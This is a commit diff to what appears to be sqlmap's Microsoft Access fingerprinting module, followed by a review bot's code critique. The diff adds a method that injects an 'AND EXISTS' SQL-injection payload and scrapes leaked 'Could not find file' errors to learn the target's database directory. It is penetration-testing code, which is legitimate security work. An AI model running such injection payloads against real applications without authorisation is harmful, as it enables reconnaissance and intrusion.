one more ms access update

Miroslav Stampar 2010-11-02 10:50:57 +00:00
parent c98d8fed83
commit 6ad8bbfc8e


@ -14,6 +14,8 @@ from lib.core.common import formatDBMSfp
from lib.core.common import formatFingerprint from lib.core.common import formatFingerprint
from lib.core.common import getHtmlErrorFp from lib.core.common import getHtmlErrorFp
from lib.core.common import randomInt from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import wasLastRequestError
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
@ -42,13 +44,13 @@ class Fingerprint(GenericFingerprint):
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
result = Request.queryPage(payload) result = Request.queryPage(payload)
retVal = "not sandboxed" if result else "sandboxed" retVal = "not sandboxed" if result else "sandboxed"
return retVal return retVal
def __sysTablesCheck(self): def __sysTablesCheck(self):
infoMsg = "executing system table(s) existance fingerprint" infoMsg = "executing system table(s) existance fingerprint"
logger.info(infoMsg) logger.info(infoMsg)
# Microsoft Access table reference updated on 01/2010 # Microsoft Access table reference updated on 01/2010
sysTables = { sysTables = {
"97": ("MSysModules2", "MSysAccessObjects"), "97": ("MSysModules2", "MSysAccessObjects"),
@ -83,6 +85,30 @@ class Fingerprint(GenericFingerprint):
return None return None
def __getDatabaseDir(self):
retVal = None
infoMsg = "searching for database directory"
logger.info(infoMsg)
randInt = randomInt()
randStr = randomStr()
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload, content=True)
if wasLastRequestError():
match = re.search("Could not find file\s+'([^']+?)'", page[0])
if match:
retVal = match.group(1).rstrip("%s.mdb" % randStr)
if retVal.endswith('\\'):
retVal = retVal[:-1]
return retVal
def getFingerprint(self): def getFingerprint(self):
value = "" value = ""
wsOsFp = formatFingerprint("web server", kb.headersFp) wsOsFp = formatFingerprint("web server", kb.headersFp)
@ -120,6 +146,8 @@ class Fingerprint(GenericFingerprint):
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()
return value return value
def checkDbms(self): def checkDbms(self):
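Review bot: The line added to getFingerprint appends `self.__getDatabaseDir()` unconditionally, so whenever the request is not flagged as an error or the regex does not match, the report prints `database directory: 'None'`; store the result first (`dbDir = self.__getDatabaseDir()`) and append under `if dbDir:`. In `__getDatabaseDir`, `rstrip("%s.mdb" % randStr)` strips a set of characters rather than a suffix, so it gives the right directory only while the character before the file name (the backslash) is outside that set; removing the known suffix by slicing after an `endswith` check would be explicit. The pattern should be a raw string, `r"Could not find file\s+'([^']+?)'"`, and `import re` is not among the imports visible in the first hunk, so confirm it exists above line 14. getFingerprint's body between the last two hunks is not shown, so the placement of the new line relative to earlier returns could not be checked.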